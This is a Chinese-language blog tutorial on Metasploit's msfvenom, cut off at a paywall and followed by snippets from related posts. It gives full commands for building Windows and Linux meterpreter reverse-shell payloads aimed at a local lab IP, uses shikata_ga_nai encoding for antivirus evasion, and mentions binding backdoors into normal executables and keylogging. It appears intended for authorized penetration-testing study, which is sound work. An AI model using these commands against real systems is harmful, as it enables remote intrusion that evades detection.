msfvenom-shll生成工具是msf 组件——Metasploit(MSF)使用详解

原创 已于 2022-04-24 11:42:14 修改 · 2.6k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #渗透测试 #安全

于 2022-04-22 10:24:11 首次发布
本文详细介绍了Metasploit框架的msfvenom工具,用于生成各种平台的payload,如Linux、PHP、Python和Windows。通过使用编码器如-x86/shikata_ga_nai进行免杀处理,并讲解了如何将payload注入到可信进程以提高session存活率。此外,还涵盖了后渗透阶段的命令,如portfwd、清除事件日志、执行应用程序、进程操作、键盘监听、屏幕监控等功能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

未经授权禁止任何渗透测试 本次实验都是在本机虚拟机

抽离 专职生成对应的payload

常见参数

-l, --list 列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,…all

-p, --payload < payload> 指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的

-f, --format < format> 指定输出格式

-e, --encoder 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload

-a, --arch < architecture> 指定payload的目标架构,例如x86 还是 x64 还是 x86_64

-o, --out < path> 指定创建好的payload的存放位置

-b, --bad-chars < list> 设定规避字符集,指定需要过滤的坏字符。例如:不使用 ‘\x0f’、‘\x00’

-n, --nopsled < length> 为payload预先指定一个NOP滑动长度

-s, --space < length> 设定有效攻击荷载的最大长度,就是文件大小

-i, --iterations < count> 指定payload的编码次数

-c, --add-code < path> 指定一个附加的win32 shellcode文件

-x, --template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中

-k, --keep 保护模板程序的动作,注入的payload作为一个新的进程运行

-v, --var-name < value> 指定一个自定义的变量,以确定输出格式

-t, --timeout 从stdin读取有效负载时等待的秒数(默认为30,0表示禁用)

-h,–help 查看帮助选项

–platform < platform> 指定payload的目标平台

抽离 专职生成对应的payload
在这里插入图片描述
在这里插入图片描述

异或 编码 免杀
在这里插入图片描述

msfvenom -l platforms 支持平台
在这里插入图片描述
在这里插入图片描述

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f exe -o /home/kali/Desktop/test1.exe

在这里插入图片描述

异或编码 -e x86/shikata_ga_nai -i 3 免杀

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.226.142 lport=55212 -f exe -e x86/shikata_ga_nai -i 3 -o /home/kali/Desktop/test2.exe

在这里插入图片描述

linux 生成 payload

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.226.142 lport=
最低0.47元/天 解锁文章

200万优质内容无限畅学
使用MSF生成shellcode
weixin_34092455的博客
04-02 1136
使用MSF生成shellcode payload和shellcode的区别 Payload是是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的,ShellCode是真正的被输入到存在漏洞的程序中的,并且ShellCode负责把程序的流程最终转移到你的Payload代码中。所以对于一个漏洞来说,ShellCode就...
MSF 生成shell命令
baidu_126894的博客
10-20 1783
MSF 生成在 Linux 下反弹的 Meterpreter Shell msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell MSF 生成反弹 Shell (C Shellcode)...
MSF-Shellcode生成使用
weixin_34301307的博客
11-12 4807
1使用环境 Kali 2.0 msfvenom 2Msfvenom参数说明 msfvenom –h 查看帮助 说明: Options: -p, --payload <payload>指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&...
msfvenom 完整使用指南
最新发布
vortex5的博客
06-30 894
msfvenomMetasploit Framework 提供的多功能 payload 生成工具,支持生成各类平台的恶意载荷。它合并了 msfpayload 和 msfencode 的功能,能够生成 Windows(exe/dll)、Linux(elf/so)、Android(apk)等多种格式的 payload,包括反弹 Shell、Meterpreter 和命令执行三类。主要功能包括自定义监听地址/端口、编码混淆绕过检测以及灵活的输出格式配置。常用命令如 msfvenom -p windows/m
MSFconsole进阶】Msfvenom后门生成模块:使用方法、shell生成、各种格式生成
05-24 2213
【渗透工具MSFconsole进阶:Msfvenom(后门生成模块)
msfvenom介绍
weixin_46483815的博客
05-11 3117
主要介绍msfvenom 和一些实验
Python之使用adb shell命令启动应用的方法详解
09-19
### Python之使用adb shell命令启动应用的方法详解 #### 背景介绍 随着移动设备的普及,越来越多的应用程序被开发出来。为了确保这些应用程序的质量,自动化测试变得尤为重要。Python作为一种强大的脚本语言,因其...
使用YOLOv5-Lite在树莓派4b上部署车辆检测模型(三)——在树莓派4b上部署模型
gzdvdsadf的博客
05-27 1446
使用YOLOv5-Lite在树莓派4b上部署车辆检测模型(一)——UA-DETRAC车辆检测数据集的处理-优快云博客使用YOLOv5-Lite在树莓派4b上部署车辆检测模型(二)——使用数据集训练模型-优快云博客在前面的两篇文章中,我们处理好了UA-DETRAC数据集,并使用这个数据集训练了v5Lite-e模型。现在我们有了训练出的pt格式的权重文件,暂且称为v5Lite-e.pt,接下来需要将这个权重文件转换格式,然后在树莓派4B上部署。
获取shell后各种命令及操作
2201_75387456的博客
05-31 1183
假设目标机器上有鼠标指针,那么说明可以输入内容,那我们就可以使用。这个时候,目标的记事本里就多出了一些内容,就是我们刚刚输入的。如果其它程序需要访问这个内网环境,就可以建立。目标机器输入东西的话,就可以获取到键盘记录。:显示自己当前系统的所有文件和文件夹。:列出当前路径下的所有文件和文件夹。指定一个自定义的变量,以确定输出格式。: 使用当前伪造的线程令牌运行进程。进行记录的导出,如果不想监听了才。:使用当前伪造的线程令牌运行进程。加载扩展后,我们可以使用基本的。当然,也可以上传很多扩展,比。
计算机中shll是什么?
不羁的博客
01-13 466
Shell是操作系统与用户之间的接口程序。它接收用户输入的命令,并将这些命令传递给操作系统内核去执行,然后将内核执行的结果返回给用户。就像一个翻译官,把用户的请求“翻译”成操作系统能理解的指令。在某些软件应用中,Shell也可以指代一种软件外壳。它是一个围绕核心功能的外层界面,用于包装和提供用户交互的方式。这种Shell主要是为了方便用户操作软件的功能,而不是直接操作操作系统。
msfvenom常用参数
m0_61506558的博客
08-29 1815
列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。例如:原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面。设定有效攻击荷载的最大长度生成payload的最大长度,就是文件大小。保护模板程序的动作,注入的payload作为一个新的进程运行。指定需要使用的encoder(编码器)编码免杀。指定需要使用的payload(攻击荷载)。...
metasploit---msfvenom
孤的博客
11-21 1612
在kali2.0的环境上,因为msfpayload没有了,被整合进了msfvenommsfvenommsfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线。 1. –p (- -payload-options) 添加载荷payload。 载荷这个东西比较多,这个软件就是根据对应的载荷payload生成对应平台下的后门,所以...
msfvenom
weixin_39407564的博客
01-06 187
msfvenommsfpayload和msfencode的组合msfpayload:攻击载荷 负责攻击msfencode: 编码加密 负责绕过杀毒软件msfvenom是用来生成后门的软件,在目标机上执行后面,在本地监听上线。可以理解为远控木马。生成的远控木马在靶机上运行,攻击机启动监听,靶机成功运行之后,攻击机就可以拿到。
Msfvenom介绍及利用
热门推荐
小小猪的博客
11-20 2万+
Msfvenom介绍及利用 简介: msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。 MSFvenomMsfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。 参数介绍: -l, --list .
MSF 生成静态免杀shell(win)
嘻嘻哈哈
01-26 2830
NO.1 利用工具 msf msf全称 MetasploitFramework,是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单。 vc++ c编译器 实现过程 1.使用msfvenom生成shellcode msfvenom -
msf生成linux shellcode,使用MSF打造各种ShellCode
weixin_39866419的博客
05-13 1161
生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...
msfvenom生成shell
向阳-Y.的博客
03-06 546
Linux msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=< Your IP Address> LPORT=< Your Port to Connect On> -f elf > shell.elf Windows msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connec
远控免杀学习笔记-msfvenom工具介绍(一)
m0_49025459的博客
04-04 479
msfvenommsfpayload和msfencode的结合体,于2015年6⽉8⽇取代了msfpayload和msfencode。在此之后,metasploit-framework下⾯的的 msfpayload(荷载⽣成器),msfencoder(编码器),msfcli(监听接⼝)都不再被⽀持。
希尔排序算法详解与实现 - 严蔚敏数据结构
例如,电话号码查询系统可以使用线性表(数组或链表)来存储数据,而磁盘目录文件系统则可能涉及到树形结构,如二叉树或B树,以快速查找和管理文件。 在计算机科学中,《算法与数据结构》是连接数学、硬件和软件的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值